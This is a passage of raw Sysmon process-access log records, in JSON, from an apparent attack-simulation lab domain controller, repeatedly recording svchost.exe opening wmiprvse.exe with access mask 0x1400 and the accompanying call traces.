C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.381\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.381","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.396\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.396","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.396\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.396","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.396\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 